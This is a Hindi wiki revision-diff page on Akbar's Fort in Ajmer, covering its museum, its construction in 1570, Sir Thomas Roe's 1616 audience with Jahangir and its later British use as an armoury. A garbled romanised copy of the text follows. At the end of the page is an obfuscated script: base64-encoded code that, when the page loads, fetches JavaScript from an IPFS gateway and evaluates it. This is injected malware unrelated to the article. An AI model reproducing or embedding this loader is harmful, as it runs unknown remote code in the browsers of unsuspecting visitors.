Difference between revisions of "अकबर का क़िला अजमेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('यह राजकीय संग्रहालय भी है। यह नया बाजार मैं स्थित है ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
यह राजकीय संग्रहालय भी है। यह नया बाजार मैं स्थित है यहाँ प्राचीन मूर्तीयाँ, सिक्के, पेंटिंग्स, कवच आदि रखे हुए हैं। अंग्रेज़ों ने यहीं से जनवरी 1616 में मुग़ल बादशाह जहाँगीर से भारत में व्यापार करने की इजाजत माँगी थी।
+
*[[राजस्थान]] के शहर [[अजमेर]] में कई [[अजमेर पर्यटन|पर्यटन स्थल]] है जिनमें से ये एक है।
 +
*यह एक राजकीय संग्रहालय भी है।  
 +
*यह नया बाजार में स्थित है।
 +
*यहाँ प्राचीन मूर्तीयाँ, सिक्के, पेंटिंग्स, कवच आदि रखे हुए हैं।  
 +
*अंग्रेज़ों ने यहीं से जनवरी 1616 में मुग़ल बादशाह [[जहाँगीर]] से [[भारत]] में व्यापार करने की इजाजत माँगी थी।
 +
*[[अकबर]] प्रति वर्ष ख्वाजा साहब के दर्शन करने तथा राजपुताना के युद्धों में भाग लेने के लिये यहाँ आया करता था।
 +
*अकबर अपने ठहरने के लिये 1570 ईस्वी में एक क़िले का निर्माण करवाया जो अकबर के क़िले के नाम से जाना जाता हैं।
 +
*बादशाह जहॉगीर भी यहाँ लोगो को झरोका दर्शन देता था।
 +
*10 जनवरी 1616 ईस्वी को [[इंग्लैण्ड]] के सम्राट जेम्स प्रथम का राजदूत सर टॉमस रॉ अकबर के क़िले में यहीं जहाँगीर से मिला था।
 +
*[[हल्दी घाटी उदयपुर|हल्दी घाटी]] के युद्ध को अंतिम रूप इसी क़िले में दिया गया था।
 +
*1818 में इस क़िले पर अंग्रेज़ों ने अधिकार कर लिया था।
 +
*उन्होंने इसका उपयोग राजपुताना शस्त्रगार के रूप में किया और वे इसे मेग्जीन के नाम से पुकारते थे।
  
 
[[Category:अजमेर के पर्यटन स्थल]][[Category:राजस्थान]][[Category:राजस्थान के पर्यटन स्थल]][[Category:पर्यटन कोश]]
 
[[Category:अजमेर के पर्यटन स्थल]][[Category:राजस्थान]][[Category:राजस्थान के पर्यटन स्थल]][[Category:पर्यटन कोश]]
 
__INDEX__
 
__INDEX__
 +
==सम्बंधित लिंक==
 +
{{राजस्थान के पर्यटन स्थल}}

Revision as of 12:14, 24 June 2010

  • rajasthan ke shahar ajamer mean kee paryatan sthal hai jinamean se ye ek hai.
  • yah ek rajakiy sangrahalay bhi hai.
  • yah naya bajar mean sthit hai.
  • yahaan prachin moortiyaan, sikke, peantiangs, kavach adi rakhe hue haian.
  • aangrezoan ne yahian se janavari 1616 mean mugal badashah jahaangir se bharat mean vyapar karane ki ijajat maangi thi.
  • akabar prati varsh khvaja sahab ke darshan karane tatha rajaputana ke yuddhoan mean bhag lene ke liye yahaan aya karata tha.
  • akabar apane thaharane ke liye 1570 eesvi mean ek qile ka nirman karavaya jo akabar ke qile ke nam se jana jata haian.
  • badashah jah aaugir bhi yahaan logo ko jharoka darshan deta tha.
  • 10 janavari 1616 eesvi ko ianglaind ke samrat jems pratham ka rajadoot sar t aaumas r aau akabar ke qile mean yahian jahaangir se mila tha.
  • haldi ghati ke yuddh ko aantim roop isi qile mean diya gaya tha.
  • 1818 mean is qile par aangrezoan ne adhikar kar liya tha.
  • unhoanne isaka upayog rajaputana shastragar ke roop mean kiya aur ve ise megjin ke nam se pukarate the.

sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>